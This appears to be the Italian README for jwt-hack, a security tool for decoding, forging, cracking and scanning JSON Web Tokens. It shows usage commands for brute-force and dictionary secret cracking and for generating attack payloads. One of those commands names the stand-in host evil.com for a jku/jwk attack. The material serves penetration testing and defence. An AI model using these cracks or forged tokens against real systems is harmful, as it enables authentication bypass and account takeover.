
Toolkit per attacchi a JSON Web Token
JSON Web Token Hack Toolkit
Un toolkit ad alte prestazioni per testare, analizzare e attaccare i JSON Web Token.
cargo install jwt-hack
brew install jwt-hack
sudo snap install jwt-hack
choco install jwt-hack
git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .
docker pull ghcr.io/hahwul/jwt-hack:latest
docker pull hahwul/jwt-hack:v2.6.0
| Modalità | Descrizione | Supporto |
|---|---|---|
| Encode | Encoder JWT/JWE | Basato su secret / Basato su chiave / Algoritmo / Header personalizzato / Compressione DEFLATE / JWE |
| Decode | Decoder JWT/JWE | Algoritmo, Verifica Issued At, Compressione DEFLATE, Struttura JWE |
| Verify | Verificatore JWT | Basato su secret / Basato su chiave (per algoritmi asimmetrici) |
| Crack | Cracker di secret | Attacco a dizionario / Brute force / Compressione DEFLATE |
| Payload | Generatore di payload di attacco JWT | none / jku&x5u / alg_confusion (firmato tramite --public-key) / iniezione kid & claim / manomissione dei claim / malleabilità della firma / sonde JWE / x5c / cty |
| Scan | Scanner di vulnerabilità | Controlli di sicurezza automatizzati per vulnerabilità JWT comuni |
| Server | Server API | Esegue la modalità Server API (http://localhost:3000) |
| MCP | Server Model Context Protocol | Integrazione con modelli AI tramite protocollo standardizzato |
Puoi decodificare sia JWT normali che compressi con DEFLATE. Lo strumento rileverà e decomprimerà automaticamente i token compressi.
jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED
jwt-hack decode COMPRESSED_JWT_TOKEN
Decodifica i token JWE (JSON Web Encryption) per analizzarne la struttura. Lo strumento rileva automaticamente il formato JWE (5 parti) e mostra i dettagli della crittografia.
# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn
# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag
jwt-hack encode '{"sub":"1234"}' --secret=your-secret
Puoi usare l'opzione --compress per applicare la compressione DEFLATE al payload del JWT.
jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress
# With Private Key
ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256
Crea token JWE (JSON Web Encryption) per testare scenari di JWT crittografati.
# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret
# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe
Verifica se la firma di un JWT è valida usando il secret o la chiave forniti.
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret
# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
Gli attacchi a dizionario e brute force supportano anche JWT compressi con DEFLATE.
# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN
# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4
jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
Scansiona automaticamente i token JWT per individuare problemi di sicurezza e vulnerabilità comuni.
# Full scan including weak secret detection and payload generation
jwt-hack scan JWT_TOKEN
# Skip secret cracking for faster results
jwt-hack scan JWT_TOKEN --skip-crack
# Skip payload generation
jwt-hack scan JWT_TOKEN --skip-payloads
# Use custom wordlist for weak secret detection
jwt-hack scan JWT_TOKEN -w custom_wordlist.txt
# Limit secret testing attempts
jwt-hack scan JWT_TOKEN --max-crack-attempts 50
Il comando scan controlla:
Avvia una REST API locale per automazione e integrazioni. Per richiedere l'autenticazione, usa --api-key e includi X-API-KEY nelle richieste.
# Start on localhost:3000 with API key protection
jwt-hack server --api-key your-api-key
# Example request (must include X-API-KEY when --api-key is set)
curl -s http://127.0.0.1:3000/health -H 'X-API-KEY: your-api-key'
jwt-hack può essere eseguito come server MCP, consentendo ai modelli AI di interagire con le funzionalità JWT tramite un protocollo standardizzato.
# Start MCP server (communicates via stdio)
jwt-hack mcp
Il server MCP espone i seguenti strumenti: